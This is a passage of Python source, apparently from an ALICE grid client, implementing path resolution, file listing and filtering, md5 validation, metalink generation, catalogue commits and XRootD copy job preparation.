if exp_path == '.': exp_path = AlienSessionInfo['currentdir']
if exp_path == '~': exp_path = AlienSessionInfo['alienHome']
if exp_path.startswith('./'): exp_path = exp_path.replace('.', AlienSessionInfo['currentdir'], 1)
if exp_path.startswith('~/'): exp_path = exp_path.replace('~', AlienSessionInfo['alienHome'], 1) # replace ~ for the usual meaning
if not exp_path.startswith('/'): exp_path = f'{AlienSessionInfo["currentdir"]}/{exp_path}' # if not full path add current directory to the referenced path
is_dir = exp_path.endswith('/')
exp_path = os.path.normpath(exp_path)
if is_dir: exp_path = f'{exp_path}/'
if check_path:
ret_obj = SendMsg(wb, 'stat', [exp_path], opts = 'nomsg log')
if ret_obj.exitcode != 0: return ''
file_stat = ret_obj.ansdict["results"][0] # stat can query and return multiple results, but we are using only one
exp_path = get_lfn_key(file_stat)
if not exp_path:
logging.error("expand_path_grid:: {exp_path} stat have no lfn nor file key!!")
return ''
path_type = file_stat["type"]
if check_writable and path_type == "d":
writable_user = writable_group = writable_others = False
perms = file_stat["perm"]
p_user = int(perms[0])
p_group = int(perms[1])
p_others = int(perms[2])
path_owner = file_stat["owner"]
path_gowner = file_stat["gowner"]
if AlienSessionInfo['user'] == path_owner and p_user == 6 or p_user == 7: writable_user = True
if AlienSessionInfo['user'] == path_gowner and p_group == 6 or p_group == 7: writable_group = True
if p_others == 6 or p_others == 7: writable_others = True
if not (p_user or p_group or p_others): return ''
return exp_path
def pathtype_grid(wb, path: str) -> str:
"""Query if a lfn is a file or directory, return f, d or empty"""
if not wb: return ''
if not path: return ''
ret_obj = SendMsg(wb, 'type', [path], opts = 'nomsg log')
if ret_obj.exitcode != 0: return ''
return str(ret_obj.ansdict['results'][0]["type"])[0]
def pathtype_local(path: str) -> str:
"""Query if a local path is a file or directory, return f, d or empty"""
if not path: return ''
p = Path(path)
if p.is_dir(): return str('d')
if p.is_file(): return str('f')
return ''
def fileIsValid(file: str, size: Union[str, int], reported_md5: str) -> RET:
"""Check if the file path is consistent with the size and md5 argument. N.B.! the local file will be deleted with size,md5 not match"""
global AlienSessionInfo
if os.path.isfile(file): # first check
if int(os.stat(file).st_size) != int(size):
os.remove(file)
return RET(1, '', f'{file} : Removed (invalid size)')
if md5(file) != reported_md5:
os.remove(file)
return RET(1, '', f'{file} : Removed (invalid md5 hash)')
return RET(0, f'{file} --> TARGET VALID')
return RET(2, '', f'{file} : No such file') # ENOENT
def create_metafile(meta_filename: str, lfn: str, local_filename: str, size: Union[str, int], md5in: str, replica_list: Union[None, list] = None) -> str:
"""Generate a meta4 xrootd virtual redirector with the specified location and using the rest of arguments"""
if not (meta_filename and replica_list): return ''
try:
with open(meta_filename, 'w') as f:
published = str(datetime.datetime.now().replace(microsecond=0).isoformat())
f.write('<?xml version="1.0" encoding="UTF-8"?>\n')
f.write(' <metalink xmlns="urn:ietf:params:xml:ns:metalink">\n')
f.write(" <published>{}</published>\n".format(published))
f.write(" <file name=\"{}\">\n".format(local_filename))
f.write(" <lfn>{}</lfn>\n".format(lfn))
f.write(" <size>{}</size>\n".format(size))
if md5in: f.write(" <hash type=\"md5\">{}</hash>\n".format(md5in))
for url in replica_list:
f.write(" <url><![CDATA[{}]]></url>\n".format(url))
f.write(' </file>\n')
f.write(' </metalink>\n')
return meta_filename
except Exception:
logging.error(traceback.format_exc())
return ''
def md5(file: str) -> str:
"""Compute the md5 digest of the specified file"""
import hashlib
BLOCKSIZE = 65536
hasher = hashlib.md5()
with open(file, 'rb') as f:
buf = f.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = f.read(BLOCKSIZE)
return hasher.hexdigest()
def format_dst_fn(src_dir, src_file, dst, parent):
"""Return the destination filename given the source dir/name, destination directory and number of parents to keep"""
# let's get destination file name (relative path with parent value)
if src_dir != src_file: # recursive operation
total_relative_path = src_file.replace(src_dir, '', 1)
src_dir_path = Path(src_dir)
src_dir_parts = src_dir_path.parts
if not src_dir.endswith('/'): src_dir_parts[:] = src_dir_parts[:-1]
src_dir = '/'.join(map(lambda x: str(x or ''), src_dir_parts))
src_dir = src_dir.replace('//', '/')
components_list = src_dir.split('/')
components_list[0] = '/' # first slash is lost in split
file_components = len(components_list) # it's directory'
if parent >= file_components: parent = file_components # make sure maximum parent var point to first dir in path
parent_selection = components_list[(file_components - parent):]
rootdir_src_dir = '/'.join(parent_selection)
file_relative_name = f'{rootdir_src_dir}/{total_relative_path}'
else:
src_file_path = Path(src_file)
file_components = len(src_file_path.parts) - 1 - 1 # without the file and up to slash
if parent >= file_components: parent = file_components # make sure maximum parent var point to first dir in path
rootdir_src_file = src_file_path.parents[parent].as_posix()
file_relative_name = src_file.replace(rootdir_src_file, '', 1)
dst_file = f'{dst}/{file_relative_name}' if dst.endswith('/') else dst
dst_file = re.sub(r"\/{2,}", "/", dst_file)
return dst_file
def setDst(file: str = '', parent: int = 0) -> str:
"""For a given file path return the file path keeping the <parent> number of components"""
p = Path(file)
path_components = len(p.parts)
if parent >= (path_components - 1): parent = path_components - 1 - 1 # IF parent >= number of components without filename THEN make parent = number of component without / and filename
basedir = p.parents[parent].as_posix()
if basedir == '/': return file
return p.as_posix().replace(basedir, '', 1)
def commit(wb, tokenstr: str, size: int, lfn: str, perm: str, expire: str, pfn: str, se: str, guid: str, md5sum: str) -> RET:
"""Upon succesful xrootd upload to server, commit the guid name into central catalogue"""
if not wb: return RET()
return SendMsg(wb, 'commit', [tokenstr, int(size), lfn, perm, expire, pfn, se, guid, md5sum], opts = 'log')
def commitFile(wb, lfnInfo: CommitInfo) -> RET:
"""Upon succesful xrootd upload to server, commit the guid name into central catalogue"""
if not wb or not lfnInfo: return RET()
return SendMsg(wb, 'commit', [lfnInfo.envelope, int(lfnInfo.size), lfnInfo.lfn, lfnInfo.perm, lfnInfo.expire, lfnInfo.pfn, lfnInfo.se, lfnInfo.guid, lfnInfo.md5], opts = 'log')
def commitFileList(wb, lfnInfo_list: list) -> list: # returns list of RET
"""Upon succesful xrootd upload to server, commit the guid name into central catalogue for a list of pfns"""
if not wb or not lfnInfo_list: return -1
batch_size = 30
batches_list = [lfnInfo_list[x:x+batch_size] for x in range(0, len(lfnInfo_list), batch_size)]
commit_results = []
for batch in batches_list:
commit_list = []
for file_commit in batch:
jsoncmd = CreateJsonCommand('commit', [file_commit.envelope, int(file_commit.size), file_commit.lfn, \
file_commit.perm, file_commit.expire, file_commit.pfn, file_commit.se, \
file_commit.guid, file_commit.md5], \
'nokeys')
commit_list.append(jsoncmd)
commit_results.extend(SendMsgMulti(wb, commit_list, 'log'))
return commit_results
def file_set_atime(path: str):
"""Set atime of file to now"""
if not os.path.isfile(path): return
file_stat = os.stat(path)
os.utime(path, (datetime.datetime.now().timestamp(), file_stat.st_mtime))
def GetHumanReadable(size, precision = 2):
"""Convert bytes to higher units"""
suffixes = ['B', 'KiB', 'MiB', 'GiB']
suffixIndex = 0
while size > 1024 and suffixIndex < 5:
suffixIndex += 1 # increment the index of the suffix
size = size/1024.0 # apply the division
return '%.*f %s' % (precision, size, suffixes[suffixIndex])
def valid_regex(regex_str: str) -> Union[None, REGEX_PATTERN_TYPE]:
"""Validate a regex string and return a re.Pattern if valid"""
regex = None
try:
regex = re.compile(regex_str.encode('unicode-escape').decode()) # try to no hit https://docs.python.org/3.6/howto/regex.html#the-backslash-plague
except re.error:
logging.error(f"regex validation failed:: {regex_str}")
return regex
def name2regex(pattern_regex: str = '') -> str:
if not pattern_regex: return ''
translated_pattern_regex = ''
re_all = '.*'
re_all_end = '[^/]*'
verbs = ('begin', 'contain', 'ends', 'ext')
pattern_list = pattern_regex.split('_')
if any(verb in pattern_regex for verb in verbs):
if pattern_list.count('begin') > 1 or pattern_list.count('end') > 1 or pattern_list.count('ext') > 1:
print_out('<begin>, <end>, <ext> verbs cannot appear more than once in the name selection')
return ''
list_begin = []
list_contain = []
list_ends = []
list_ext = []
for idx, tokenstr in enumerate(pattern_list):
if tokenstr == 'begin': list_begin.append(KV(tokenstr, pattern_list[idx + 1]))
if tokenstr == 'contain': list_contain.append(KV(tokenstr, pattern_list[idx + 1]))
if tokenstr == 'ends': list_ends.append(KV(tokenstr, pattern_list[idx + 1]))
if tokenstr == 'ext': list_ext.append(KV(tokenstr, pattern_list[idx + 1]))
if list_begin:
translated_pattern_regex = re_all + '/' + f'{list_begin[0].val}{re_all_end}' # first string after the last slash (last match exclude /)
for patt in list_contain:
if not list_begin: translated_pattern_regex = f'{re_all}'
translated_pattern_regex = f'{translated_pattern_regex}{patt.val}{re_all_end}'
if list_ends:
translated_pattern_regex = f'{translated_pattern_regex}{list_ends[0].val}{re_all_end}'
if list_ext:
translated_pattern_regex = translated_pattern_regex + "\\." + list_ext[0].val
if translated_pattern_regex:
if list_ext:
translated_pattern_regex = f'{translated_pattern_regex}' + '$'
else:
translated_pattern_regex = f'{translated_pattern_regex}{re_all_end}' + '$'
return translated_pattern_regex
def gid2name(gid: Union[str, int]) -> str:
"""From the list of all groups return the name of gid"""
return str(grp.getgrgid(int(gid)).gr_name)
def file2file_dict(fn: str) -> dict:
"""Take a string as path and retur a dict with file propreties"""
try:
file_path = Path(fn)
except Exception as e:
return {}
try:
file_name = file_path.expanduser().resolve(strict = True).as_posix()
except Exception as e:
return {}
file_dict = {"file": file_name}
file_dict["lfn"] = file_name
file_dict["size"] = str(file_path.stat().st_size)
file_dict["mtime"] = str(int(file_path.stat().st_mtime * 1000))
file_dict["md5"] = md5(file_name)
file_dict["owner"] = pwd.getpwuid(file_path.stat().st_uid).pw_name
file_dict["gowner"] = gid2name(file_path.stat().st_gid)
return file_dict
def filter_file_prop(f_obj: dict, base_dir: str, find_opts: Union[str, list, None]) -> bool:
"""Return True if an file dict object pass the conditions in find_opts"""
if not f_obj or not base_dir: return False
if not find_opts: return True
opts = find_opts.split() if isinstance(find_opts, str) else find_opts.copy()
min_depth = get_arg_value(opts, '-min_depth')
if min_depth and min_depth.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
max_depth = get_arg_value(opts, '-max_depth')
if max_depth and max_depth.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
min_size = get_arg_value(opts, '-min_size')
if min_size and min_size.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
max_size = get_arg_value(opts, '-max_size')
if max_size and max_size.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
min_ctime = get_arg_value(opts, '-min_ctime')
if min_ctime and min_ctime.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
max_ctime = get_arg_value(opts, '-max_ctime')
if max_ctime and max_ctime.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
jobid = get_arg_value(opts, '-jobid')
if jobid and jobid.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
user = get_arg_value(opts, '-user')
if user and user.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
group = get_arg_value(opts, '-group')
if group and group.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
if min_depth or max_depth:
lfn = get_lfn_key(f_obj)
relative_lfn = lfn.replace(base_dir, '') # it will have N directories + 1 file components
if min_depth:
min_depth = abs(int(min_depth)) + 1 # add +1 for the always present file component of relative_lfn
if len(relative_lfn.split('/')) < int(min_depth): return False
if max_depth:
max_depth = abs(int(max_depth)) + 1 # add +1 for the always present file component of relative_lfn
if len(relative_lfn.split('/')) > int(max_depth): return False
if min_size and int(f_obj["size"]) < abs(int(min_size)): return False
if max_size and int(f_obj["size"]) > abs(int(max_size)): return False
if user and f_obj["owner"] != user: return False
if group and f_obj["gowner"] != group: return False
# the argument can be a string with a form like: '20.12.2016 09:38:42,76','%d.%m.%Y %H:%M:%S,%f'
# see: https://docs.python.org/3.6/library/datetime.html#strftime-strptime-behavior
if min_ctime:
min_ctime = time_str2unixmili(min_ctime)
if int(f_obj["ctime"]) < min_ctime: return False
if max_ctime:
max_ctime = time_str2unixmili(max_ctime)
if int(f_obj["ctime"]) > max_ctime: return False
if jobid:
if "jobid" not in f_obj: return False
if f_obj["jobid"] != jobid: return False
return True
def list_files_grid(wb, dir: str, pattern: Union[None, REGEX_PATTERN_TYPE, str] = None, is_regex: bool = False, find_args: str = '') -> RET:
"""Return a list of files(lfn/grid files) that match pattern found in dir
Returns a RET object (from find), and takes: wb, directory, pattern, is_regex, find_args"""
if not dir: return RET(-1, "", "No search directory specified")
# lets process the pattern: extract it from src if is in the path globbing form
is_single_file = False # dir actually point to a file
dir_arg_list = dir.split()
if len(dir_arg_list) > 1: # dir is actually a list of arguments
if not pattern: pattern = dir_arg_list.pop(-1)
dir = dir_arg_list.pop(-1)
if dir_arg_list: find_args = ' '.join(dir_arg_list)
if '*' in dir: # we have globbing in src path
is_regex = False
src_arr = dir.split("/")
base_path_arr = [] # let's establish the base path
for el in src_arr:
if '*' not in el:
base_path_arr.append(el)
else:
break
for el in base_path_arr: src_arr.remove(el) # remove the base path
dir = '/'.join(base_path_arr) + '/' # rewrite the source path without the globbing part
pattern = '/'.join(src_arr) # the globbing part is the rest of element that contain *
else: # pattern is specified by argument
if pattern is None:
if not dir.endswith('/'): # this is a single file
is_single_file = True
else:
pattern = '*' # prefer globbing as default
elif type(pattern) == REGEX_PATTERN_TYPE: # unlikely but supported to match signatures
pattern = pattern.pattern # We pass the regex pattern into command as string
is_regex = True
if is_regex and type(pattern) is str: # it was explictly requested that pattern is regex
if valid_regex(pattern) is None:
logging.error(f"list_files_grid:: {pattern} failed to re.compile")
return RET(-1, "", f"list_files_grid:: {pattern} failed to re.compile")
# remove default from additional args
find_args_list = None
filter_args_list = []
if find_args:
find_args_list = find_args.split()
get_arg(find_args_list, '-a')
get_arg(find_args_list, '-s')
get_arg(find_args_list, '-f')
get_arg(find_args_list, '-d')
get_arg(find_args_list, '-w')
get_arg(find_args_list, '-wh')
min_depth = get_arg_value(find_args_list, '-min_depth')
if min_depth:
if min_depth.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-min_depth', min_depth])
max_depth = get_arg_value(find_args_list, '-max_depth')
if max_depth:
if max_depth.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-max_depth', max_depth])
min_size = get_arg_value(find_args_list, '-min_size')
if min_size:
if min_size.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-min_size', min_size])
max_size = get_arg_value(find_args_list, '-max_size')
if max_size:
if max_size.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-max_size', max_size])
min_ctime = get_arg_value(find_args_list, '-min_ctime')
if min_ctime:
if min_ctime.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-min_ctime', min_ctime])
max_ctime = get_arg_value(find_args_list, '-max_ctime')
if max_ctime:
if max_ctime.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-max_ctime', max_ctime])
jobid = get_arg_value(find_args_list, '-jobid')
if jobid:
if jobid.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-jobid', jobid])
user = get_arg_value(find_args_list, '-user')
if user:
if user.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-user', user])
group = get_arg_value(find_args_list, '-group')
if group:
if group.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-group', group])
# create and return the list object just for a single file
if is_single_file:
send_opts = 'nomsg' if not _DEBUG else ''
ret_obj = SendMsg(wb, 'stat', [dir], opts = send_opts)
else:
find_args_default = ['-f', '-a', '-s']
if is_regex: find_args_default.insert(0, '-r')
if find_args_list: find_args_default.extend(find_args_list) # insert any other additional find arguments
find_args_default.append(dir)
find_args_default.append(pattern)
send_opts = 'nomsg' if not _DEBUG else ''
ret_obj = SendMsg(wb, 'find', find_args_default, opts = send_opts)
if ret_obj.exitcode != 0:
logging.error(f"list_files_grid error:: {dir} {pattern} {find_args}")
return ret_obj
if 'results' not in ret_obj.ansdict or not ret_obj.ansdict["results"]:
logging.error(f"list_files_grid exitcode==0 but no results(!!!):: {dir} /pattern: {pattern} /find_args: {find_args}")
return RET(2, "", f"No files found in :: {dir} /pattern: {pattern} /find_args: {find_args}")
exitcode = ret_obj.exitcode
stderr = ret_obj.err
results_list = ret_obj.ansdict["results"]
results_list_filtered = []
# items that pass the conditions are the actual/final results
for found_lfn_dict in results_list: # parse results to apply filters
if not filter_file_prop(found_lfn_dict, dir, filter_args_list): continue
# at this point all filters were passed
results_list_filtered.append(found_lfn_dict)
if not results_list_filtered:
return RET(2, "", f"No files passed the filters :: {dir} /pattern: {pattern} /find_args: {find_args}")
ansdict = {"results": results_list_filtered}
lfn_list = [get_lfn_key(lfn_obj) for lfn_obj in results_list_filtered]
stdout = '\n'.join(lfn_list)
return RET(exitcode, stdout, stderr, ansdict)
def list_files_local(dir: str, pattern: Union[None, REGEX_PATTERN_TYPE, str] = None, is_regex: bool = False, find_args: str = '') -> RET:
"""Return a list of files(local)(N.B! ONLY FILES) that match pattern found in dir"""
if not dir: return RET(2, "", "No search directory specified")
# lets process the pattern: extract it from src if is in the path globbing form
regex = None
is_single_file = False # dir actually point to a file
if '*' in dir: # we have globbing in src path
is_regex = False
src_arr = dir.split("/")
base_path_arr = [] # let's establish the base path
for el in src_arr:
if '*' not in el:
base_path_arr.append(el)
else:
break
for el in base_path_arr: src_arr.remove(el) # remove the base path
dir = '/'.join(base_path_arr) + '/' # rewrite the source path without the globbing part
pattern = '/'.join(src_arr) # the globbing part is the rest of element that contain *
else: # pattern is specified by argument or not specified
if pattern is None:
if not dir.endswith('/'): # this is a single file
is_single_file = True
else:
pattern = '*' # prefer globbing as default
elif type(pattern) == REGEX_PATTERN_TYPE: # unlikely but supported to match signatures
regex = pattern
is_regex = True
elif type(pattern) is str and is_regex: # it was explictly requested that pattern is regex
regex = valid_regex(pattern)
if regex is None:
logging.error(f"list_files_grid:: {pattern} failed to re.compile")
return RET(-1, "", f"list_files_grid:: {pattern} failed to re.compile")
directory = None # resolve start_dir to an absolute_path
try:
directory = Path(dir).expanduser().resolve(strict = True).as_posix()
except FileNotFoundError:
return RET(2, "", f"{dir} not found")
except RuntimeError:
return RET(2, "", f"Loop encountered along the resolution of {dir}")
filter_args_list = None
if find_args: filter_args_list = find_args.split() # for local files listing we have only filtering options
file_list = None # make a list of filepaths (that match a regex or a glob)
if is_single_file:
file_list = [directory]
elif is_regex:
file_list = [os.path.join(root, f) for (root, dirs, files) in os.walk(directory) for f in files if regex.match(os.path.join(root, f))]
else:
file_list = [p.expanduser().resolve(strict = True).as_posix() for p in list(Path(directory).glob(f'**/{pattern}')) if p.is_file()]
if not file_list:
return RET(2, "", f"No files found in :: {str} /pattern: {pattern} /find_args: {find_args}")
# convert the file_list to a list of file properties dictionaries
results_list = [file2file_dict(filepath) for filepath in file_list]
results_list_filtered = []
# items that pass the conditions are the actual/final results
for found_lfn_dict in results_list: # parse results to apply filters
if not filter_file_prop(found_lfn_dict, directory, filter_args_list): continue
# at this point all filters were passed
results_list_filtered.append(found_lfn_dict)
if not results_list_filtered:
return RET(2, "", f"No files passed the filters :: {str} /pattern: {pattern} /find_args: {find_args}")
ansdict = {"results": results_list_filtered}
lfn_list = [get_lfn_key(lfn_obj) for lfn_obj in results_list_filtered]
stdout = '\n'.join(file_list)
return RET(exitcode, stdout, '', ansdict)
def extract_glob_pattern(path_arg: str) -> tuple:
"""Extract glob pattern from a path"""
if not path_arg: return None, None
base_path = pattern = None
if '*' in path_arg: # we have globbing in src path
path_components = path_arg.split("/")
base_path_arr = [] # let's establish the base path
for el in path_components:
if '*' not in el: base_path_arr.append(el)
else: break
for el in base_path_arr: path_components.remove(el) # remove the base path components (those without *) from full path components
base_path = '/'.join(base_path_arr) + '/' # rewrite the source path without the globbing part
pattern = '/'.join(path_components) # the globbing part is the rest of element that contain *
else:
base_path = path_arg
return (base_path, pattern)
def check_path(wb, path_arg: str, check_path: bool = False) -> tuple:
"""Check if path exists and what kind; returns the resolved path and the location"""
location = 'grid' # default location is grid; MANDATORY specification of file: for local
filepath = None
if path_arg.startswith('file:'): location = 'local'
path_arg = lfn_prefix_re.sub('', path_arg) # lets remove any prefixes
filepath = path_arg
if check_path:
if location == 'local': filepath = expand_path_local(path_arg, check_path = True)
if location == 'grid': filepath = expand_path_grid(wb, path_arg, check_path = True)
return (filepath, location)
def makelist_lfn(wb, arg_source, arg_target, find_args: list, parent: int, overwrite: bool, pattern: Union[None, REGEX_PATTERN_TYPE, str], is_regex: bool, copy_list: list, strictspec: bool = False, httpurl: bool = False) -> RET: # pylint: disable=unused-argument
"""Process a source and destination copy arguments and make a list of individual lfns to be copied"""
isSrcDir = isDstDir = isSrcLocal = isDownload = specs = None # make sure we set these to valid values later
# lets extract the specs from both src and dst if any (to clean up the file-paths) and record specifications like disk=3,SE1,!SE2
src_specs_remotes = specs_split.split(arg_source, maxsplit = 1) # NO comma allowed in names (hopefully)
arg_src = src_specs_remotes.pop(0) # first item is the file path, let's remove it; it remains disk specifications
src_specs = src_specs_remotes.pop(0) if src_specs_remotes else None # whatever remains is the specifications
dst_specs_remotes = specs_split.split(arg_target, maxsplit = 1)
arg_dst = dst_specs_remotes.pop(0)
dst_specs = dst_specs_remotes.pop(0) if dst_specs_remotes else None
# lets process the pattern: extract it from src if is in the path globbing form
src_glob = False
if '*' in arg_src: # we have globbing in src path
src_glob = True
arg_src, pattern = extract_glob_pattern(arg_src)
else: # pattern is specified by argument
if type(pattern) == REGEX_PATTERN_TYPE: # unlikely but supported to match signatures
pattern = pattern.pattern # We pass the regex pattern into command as string
is_regex = True
if is_regex and type(pattern) is str: # it was explictly requested that pattern is regex
if valid_regex(pattern) is None:
msg = f"makelist_lfn:: {pattern} failed to re.compile"
logging.error(msg)
return RET(64, '', msg) # EX_USAGE /* command line usage error */
slashend_src = arg_src.endswith('/') # after extracting the globbing if present we record the slash
# N.B.!!! the check will be wrong when the same relative path is present local and on grid
# first let's check only prefixes
src, src_type = check_path(wb, arg_src, check_path = False)
dst, dst_type = check_path(wb, arg_dst, check_path = False) # do not check path, it can be missing and then auto-created
if src_type == dst_type == 'grid':
return RET(1, '', 'grid to grid copy is WIP; for the moment use two steps: dowload file and upload it; local src,dst should be ALWAYS prefixed with file:')
if src_type == dst_type == 'local':
return RET(1, '', 'for local copy use system command; within interactiv shell start a system command with "!"')
isSrcLocal = (src_type == 'local')
if isSrcLocal:
src = expand_path_local(src, check_path = True)
dst = expand_path_grid(wb, dst, check_path = False)
else:
src = expand_path_grid(wb, src, check_path = True)
dst = expand_path_local(dst, check_path = False)
if not src: return RET(2, '', f'{arg_src} => {src} does not exist (or not accessible) on {src_type}') # ENOENT /* No such file or directory */
if slashend_src and not src.endswith('/'): src = f"{src}/" # recover the slash if lost
if src.endswith('/') and not dst.endswith('/'): dst = f"{dst}/"
isDstDir = isSrcDir = src.endswith('/') # is src is dir, so dst must be
isDownload = not isSrcLocal
if isSrcDir and not src_glob and not slashend_src: parent = parent + 1 # cp/rsync convention: with / copy the contents, without it copy the actual dir
if isDownload:
try: # we can try anyway, this is like mkdir -p
mk_path = Path(dst) if dst.endswith('/') else Path(dst).parent # if destination is file create it dir parent
mk_path.mkdir(parents=True, exist_ok=True)
except Exception:
logging.error(traceback.format_exc())
msg = f"Could not create local destination directory: {mk_path.as_posix()}\ncheck log file {_DEBUG_FILE}"
return RET(42, '', msg) # ENOMSG /* No message of desired type */
else: # this is upload to GRID
mk_path = dst if dst.endswith('/') else Path(dst).parent.as_posix()
ret_obj = SendMsg(wb, 'mkdir', ['-p', mk_path], opts = 'nomsg') # do it anyway, there is not point in checking before
if retf_print(ret_obj, opts = 'noprint err') != 0: return ret_obj # just return the mkdir result
specs = src_specs if isDownload else dst_specs # only the grid path can have specs
specs_list = specs_split.split(specs) if specs else []
if strictspec: print_out("Strict specifications were enabled!! Command may fail!!")
if httpurl and isSrcLocal:
print_out("httpurl option is ignored for uploads")
httpurl = False
error_msg = '' # container which accumulates the error messages
isWrite = not isDownload
if isDownload: # pylint: disable=too-many-nested-blocks # src is GRID, we are DOWNLOADING from GRID directory
results_list = list_files_grid(wb, src, pattern, is_regex, " ".join(find_args))
if "results" not in results_list.ansdict or len(results_list.ansdict["results"]) < 1:
msg = f"No files found with: find {' '.join(find_args)} {'-r' if is_regex else ''} -a -s {src} {pattern}"
return RET(42, '', msg) # ENOMSG /* No message of desired type */
for lfn_obj in results_list.ansdict["results"]: # make CopyFile objs for each lfn
lfn = get_lfn_key(lfn_obj)
dst_filename = format_dst_fn(src, lfn, dst, parent)
if os.path.isfile(dst_filename):
if not overwrite:
print_out(f'{dst_filename} exists, skipping..')
continue
# -f (force) was used
file_size = lfn_obj['size']
file_md5 = lfn_obj['md5']
if retf_print(fileIsValid(dst_filename, file_size, file_md5)) == 0:
continue # destination exists and is valid, no point to re-download
tokens = lfn2fileTokens(wb, lfn2file(lfn, dst_filename), specs_list, isWrite, strictspec, httpurl)
if not tokens or 'answer' not in tokens: continue
copy_list.append(CopyFile(lfn, dst_filename, isWrite, tokens['answer'], lfn))
else: # src is LOCAL, we are UPLOADING from LOCAL directory
results_list = list_files_local(src, pattern, is_regex, " ".join(find_args))
if "results" not in results_list.ansdict or len(results_list.ansdict["results"]) < 1:
msg = f"No files found in: {src} /pattern: {pattern} /find_args: {' '.join(find_args)}"
return RET(42, '', msg) # ENOMSG /* No message of desired type */
for file in results_list.ansdict["results"]:
file_path = get_lfn_key(file)
lfn = format_dst_fn(src, file_path, dst, parent)
if pathtype_grid(wb, lfn) == 'f': # lfn exists
if not overwrite:
print_out(f'{lfn} exists, skipping..')
continue
print_out(f'{lfn} exists, deleting..') # we want to overwrite so clear up the destination lfn
ret_obj = SendMsg(wb, 'rm', ['-f', lfn], opts = 'nomsg')
tokens = lfn2fileTokens(wb, lfn2file(lfn, file_path), specs_list, isWrite, strictspec)
if not tokens or 'answer' not in tokens: continue
copy_list.append(CopyFile(file_path, lfn, isWrite, tokens['answer'], lfn))
return RET(1, '', error_msg) if error_msg else RET(0)
def makelist_xrdjobs(copylist_lfns: list, copylist_xrd: list):
"""Process a list of lfns to add to XRootD copy jobs list"""
for cpfile in copylist_lfns:
if 'results' not in cpfile.token_request:
print_err(f"No token info for {cpfile}\nThis message should not happen! Please contact the developer if you see this!")
continue
if len(cpfile.token_request['results']) < 1:
print_err(f'Could not find working replicas for {cpfile.src}')
continue
if cpfile.isUpload: # src is local, dst is lfn, request is replica(pfn)
for replica in cpfile.token_request['results']:
copylist_xrd.append(CopyFile(cpfile.src, f"{replica['url']}?xrd.wantprot=unix&authz={replica['envelope']}", cpfile.isUpload, replica, cpfile.dst))
else: # src is lfn(remote), dst is local, request is replica(pfn)
size_4meta = cpfile.token_request['results'][0]['size'] # size SHOULD be the same for all replicas
md5_4meta = cpfile.token_request['results'][0]['md5'] # the md5 hash SHOULD be the same for all replicas
file_in_zip = None
url_list_4meta = []
for replica in cpfile.token_request['results']:
url_components = replica['url'].rsplit('#', maxsplit = 1)
if len(url_components) > 1: file_in_zip = url_components[1]
# if is_pfn_readable(url_components[0]): # it is a lot cheaper to check readability of replica than to try and fail a non-working replica
url_list_4meta.append(f'{url_components[0]}?xrd.wantprot=unix&authz={replica["envelope"]}')
# Create the metafile as a temporary uuid5 named file (the lfn can be retrieved from meta if needed)
metafile = create_metafile(make_tmp_fn(cpfile.src, '.meta4', uuid5 = True), cpfile.src, cpfile.dst, size_4meta, md5_4meta, url_list_4meta)
if not metafile:
print_err(f"Could not create the download metafile for {cpfile.src}")
continue
if file_in_zip and 'ALIENPY_NOXRDZIP' not in os.environ: metafile = f'{metafile}?xrdcl.unzip={file_in_zip}'
if _DEBUG: print_out(f'makelist_xrdjobs:: {metafile}')
copylist_xrd.append(CopyFile(metafile, cpfile.dst, cpfile.isUpload, {}, cpfile.src)) # we do not need the tokens in job list when downloading
def DO_XrootdCp(wb, xrd_copy_command: Union[None, list] = None, printout: str = '') -> RET:
"""XRootD cp function :: process list of arguments for a xrootd copy command"""
if not _HAS_XROOTD: return RET(1, "", 'DO_XrootdCp:: python XRootD module not found or lower than 5.3.3, the copy process cannot continue')
if xrd_copy_command is None: xrd_copy_command = []
global AlienSessionInfo
if not wb: return RET(107, "", 'DO_XrootdCp:: websocket not found') # ENOTCONN /* Transport endpoint is not connected */
if not xrd_copy_command or len(xrd_copy_command) < 2 or is_help(xrd_copy_command):
help_msg = xrdcp_help()
return RET(0, help_msg) # EX_USAGE /* command line usage error */
# XRootD copy parameters
# inittimeout: copy initialization timeout(int)
# tpctimeout: timeout for a third-party copy to finish(int)
# coerce: ignore file usage rules, i.e. apply `FORCE` flag to open() (bool)
# :param checksummode: checksum mode to be used #:type checksummode: string
# :param checksumtype: type of the checksum to be computed #:type checksumtype: string
# :param checksumpreset: pre-set checksum instead of computing it #:type checksumpreset: string
hashtype = str('md5')
batch = int(1) # from a list of copy jobs, start <batch> number of downloads
sources = int(1) # max number of download sources
streams = int(1) # uses num additional parallel streams to do the transfer; use defaults from XrdCl/XrdClConstants.hh
chunks = int(4) # number of chunks that should be requested in parallel; use defaults from XrdCl/XrdClConstants.hh
